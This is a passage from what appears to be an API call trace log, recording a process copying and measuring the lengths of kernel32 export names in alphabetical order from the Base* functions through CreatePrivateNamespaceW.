(lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.033] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.033] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.033] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.033] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.033] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.033] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.033] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.034] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.034] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.034] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.034] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.034] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.034] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.034] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.034] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.034] lstrlenA (lpString="BEEP") returned 4 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.034] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.034] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.034] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.034] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.034] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.034] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.034] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.034] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.034] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.035] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.035] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.035] lstrlenA (lpString="CANCELIO") returned 8 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.035] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.035] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.035] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.035] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.035] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.035] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.035] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.035] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.035] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.035] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.035] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.035] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.035] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.035] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.035] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.036] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.036] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.036] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.036] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.036] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.036] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.036] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.036] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.036] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.036] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.036] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.036] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.036] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.036] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.036] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.036] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.036] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.036] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.036] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.037] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.037] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.037] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.037] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.037] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.037] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.037] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.037] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.037] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.037] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.037] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.037] lstrlenA (lpString="COPYFILEA") returned 9 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.037] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.037] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.037] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.037] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.037] lstrlenA (lpString="COPYFILEW") returned 9 [0085.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.037] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.038] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.038] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.038] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.038] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.038] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.038] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.038] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.038] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.038] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.038] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.038] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.038] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.038] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.038] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.038] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.038] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.038] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.038] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.039] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.039] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.039] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.039] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.039] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.039] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.039] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.039] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.039] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.039] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.039] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.039] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.039] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.039] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.039] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.039] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.039] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.039] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.040] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.040] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.040] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.040] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.040] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.040] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.040] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.040] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.040] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.040] lstrcpyA (in: 